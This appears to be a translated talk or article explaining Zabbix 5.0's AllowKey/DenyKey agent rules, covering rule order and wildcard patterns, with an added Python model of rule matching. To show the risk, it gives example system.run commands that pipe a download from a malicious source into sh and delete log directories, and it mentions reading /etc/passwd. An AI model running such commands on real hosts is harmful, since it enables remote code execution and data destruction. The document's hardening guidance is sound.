Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Blacklist and whitelist support for agent-side metrics

Tikhon Uskov, Integration Engineer, Zabbix

Data security issues

Zabbix 5.0 has a new feature that lets you improve security on systems that use Zabbix Agent, and it replaces the old parameter EnableRemoteCommands.

The security improvement for agent-based systems stems from the fact that the agent can perform a large number of potentially dangerous actions.

  • The agent can collect almost any information, including confidential or potentially dangerous information, from configuration files, log files, password files, and any other files.

For example, using the zabbix_get utility you can access the list of users, their home directories, password files, etc.

Accessing data using the zabbix_get utility

NOTE. Data can be retrieved only if the agent has read permission on the corresponding file. But, for example, the file /etc/passwd is readable by all users.

  • The agent can also execute potentially dangerous commands. For example, the key system.run[*] lets you execute any remote commands on network nodes, including running scripts from the Zabbix web interface, which also execute commands on the agent side.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • On Linux, the agent runs by default without root privileges, while on Windows it runs as a service under the System account and has unrestricted access to the file system. Accordingly, if no changes are made to the Zabbix Agent parameters after installation, the agent has access to the registry and the file system and can execute WMI queries.

In earlier versions, the parameter EnableRemoteCommands=0 only allowed you to disable metrics with the key system.run[*] and the running of scripts from the web interface. There was no way to restrict access to individual files, to allow or disable individual keys installed with the agent, or to restrict the use of individual parameters.

Using the EnableRemoteCommands parameter in earlier versions of Zabbix

AllowKey/DenyKey

Zabbix 5.0 helps protect against such unauthorized access by providing whitelists and blacklists for allowing and denying metrics on the agent side.

In Zabbix 5.0 all keys, including system.run[*], are enabled, and two new agent configuration options have been added:

AllowKey=<pattern> - allowed checks;

DenyKey=<pattern> - denied checks;

where <pattern> is a key name pattern with parameters that uses metacharacters (*).

The AllowKey and DenyKey keys let you allow or deny individual metrics based on a specific pattern. Unlike other configuration parameters, the number of AllowKey/DenyKey parameters is not limited. This lets you define precisely what the agent may do on the system by building a tree of checks (executable keys), where the order in which they are written plays a very important role.

Order of rules

Rules are checked in the order in which they are entered in the configuration file. A key is checked against the rules until the first match, and as soon as the data item's key matches a pattern, it is allowed or denied. After that, rule checking stops and the remaining keys are ignored.

So, if an item matches both an allow rule and a deny rule, the result depends on which rule comes first in the configuration file.

2 different rules with the same pattern and the key vfs.file.size[/tmp/file]

The order for using AllowKey/DenyKey keys:

  1. exact rules,
  2. general rules,
  3. the prohibiting rule.

For example, if you need access to files in a particular folder, you must first allow access to them, and then deny everything else that does not fall within the established permissions. If the deny rule is applied first, access to the folder will be denied.

Correct order

If you need to allow 2 utilities to run via system.run[*], and the deny rule is specified first, the utilities will not run, because the first pattern will always match any key, and the subsequent rules will be ignored.

Incorrect order

Patterns

Basic rules

A pattern is an expression with wildcards. The metacharacter (*) matches any number of any characters in a specific position. Metacharacters can be used both in the key name and in the parameters. For example, you can strictly define the first parameter as text and specify the following one as a wildcard.

Parameters must be enclosed in square brackets [].

  • system.run[* - incorrect
  • vfs.file*.txt] - incorrect
  • vfs.file.*[*] - correct

Examples of wildcard use.

  1. In the key name and in the parameter. In this case the key does not match the same key without a parameter, because in the pattern we indicated that we want a specific ending of the key name and a specific set of parameters.
  2. If the pattern does not use square brackets, the pattern allows all keys that contain no parameters and denies all keys that contain the specified parameter.
  3. If the key is written in full and the parameters are specified as a wildcard, it will match any such key with any parameters and will not match the key without square brackets, that is, it will be allowed or denied.

Rules for filling in parameters.

  • If a key with parameters is intended to be used, the parameters must be specified in the configuration file. Parameters must be specified as a metacharacter. You need to deny access to any file carefully and take into account what information the metric can provide under different spellings - with and without parameters.

Specifics of writing keys with parameters

  • If a key is specified with parameters, but the parameters are optional and specified as a metacharacter, the key without parameters will be allowed. For example, if you want to disable receiving information about the CPU load and specify that the key system.cpu.load[*] should be disabled, do not forget that the key without parameters will return the average load value.

Rules for filling in parameters
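
The first-match rule order and the parameterless-key pitfall described in the two sections above, as an added example (not code from the original article or from Zabbix). It is a simplified model: `*` is treated as any run of characters over the whole key string, keys that match no rule stay allowed as the article states for 5.0, and the utility paths in the sample configurations are hypothetical.

```python
import re

def parse_rules(conf_text):
    """Return [(action, pattern)] for AllowKey/DenyKey lines, in file order."""
    rules = []
    for line in conf_text.splitlines():
        name, sep, value = line.strip().partition("=")
        if sep and name.strip() in ("AllowKey", "DenyKey"):
            rules.append((name.strip(), value.strip()))
    return rules

def matches(pattern, key):
    """Simplified wildcard match: '*' is any run of characters, the rest is literal."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, key, re.DOTALL) is not None

def decide(rules, key):
    """First matching rule wins; keys that match nothing stay allowed (assumption)."""
    for action, pattern in rules:
        if matches(pattern, key):
            return action
    return "AllowKey"

def parameterless_gaps(rules):
    """Candidates to review: keys denied only as name[*] whose bare form is allowed."""
    gaps = []
    for action, pattern in rules:
        if action == "DenyKey" and pattern.endswith("[*]"):
            bare = pattern[:-3]
            if "*" not in bare and decide(rules, bare) == "AllowKey":
                gaps.append(bare)
    return gaps

# Constructed sample configurations; the script paths are hypothetical.
CORRECT = """
AllowKey=system.run[/usr/local/bin/check_disk.sh]
AllowKey=system.run[/usr/local/bin/check_raid.sh]
DenyKey=system.run[*]
DenyKey=system.cpu.load[*]
"""
WRONG = """
DenyKey=system.run[*]
AllowKey=system.run[/usr/local/bin/check_disk.sh]
"""

if __name__ == "__main__":
    probe = "system.run[/usr/local/bin/check_disk.sh]"
    print("correct order:", decide(parse_rules(CORRECT), probe))
    print("wrong order:  ", decide(parse_rules(WRONG), probe))
    print("review:", parameterless_gaps(parse_rules(CORRECT)))
```

The bare `system.run` is reported alongside `system.cpu.load` because the check cannot know which keys accept optional parameters; treat its output as candidates to review, not as confirmed gaps.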

Notes

Configuration

  • Some rules cannot be changed by the user, for example discovery rules or agent auto-registration rules. AllowKey/DenyKey rules do not affect the following parameters:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

NOTE. If an administrator disables a key, then when it is queried Zabbix gives no information about why the metric or key falls into the 'NOTSUPPORTED' category. Information about prohibitions on executing remote commands is also not shown in the agent log files. This is for security reasons, but it can make debugging difficult if metrics fall into the unsupported category for some reason.

  • You should not rely on any particular order for including external configuration files (for example, alphabetical order).

Command-line utilities

After configuring the rules, you need to make sure that everything is set up correctly.

You can use one of three options:

  • Add the metric to Zabbix.
  • Test with zabbix_agentd. The Zabbix agent with the --print (-p) option shows all keys (allowed by default) except those that are not allowed by the configuration. With the --test (-t) option, a denied key returns 'Unsupported item key'.
  • Test with zabbix_get. The zabbix_get utility with the -k option returns 'ZBX_NOTSUPPORTED: Unknown metric'.

Allow or deny

You can deny access to a file and verify, for example using the zabbix_get utility, that access to the file is denied.

NOTE. Quotes in the parameter are ignored.

At the same time, access to such a file may be allowed via a different path. For example, if a symlink leads to it.

It is recommended to test various ways of applying the specified rules, and also to consider the possibilities of bypassing the prohibitions.

Questions and answers

Question. Why was such a complex pattern with its own language chosen to describe rules, permissions and prohibitions? Why was it not possible to use, for example, the regular expressions that Zabbix uses?

Answer. This is a matter of regex performance, since there is usually only one agent and it checks a large number of metrics. Regex is a rather heavy operation and we cannot check thousands of metrics this way. Wildcards are a universal, widely used and simple solution.

Question. Aren't Include files included in alphabetical order?

Answer. As far as I know, it is practically impossible to predict the order in which rules will be applied if you spread the rules across different files. I recommend collecting all AllowKey/DenyKey rules in one Include file, because they interact with each other, and including that file.

Question. In Zabbix 5.0 the option 'EnableRemoteCommands=' is missing from the configuration file, and only AllowKey/DenyKey are available?

Answer. Yes, that's right.

Thank you for your attention!

Source: www.habr.com
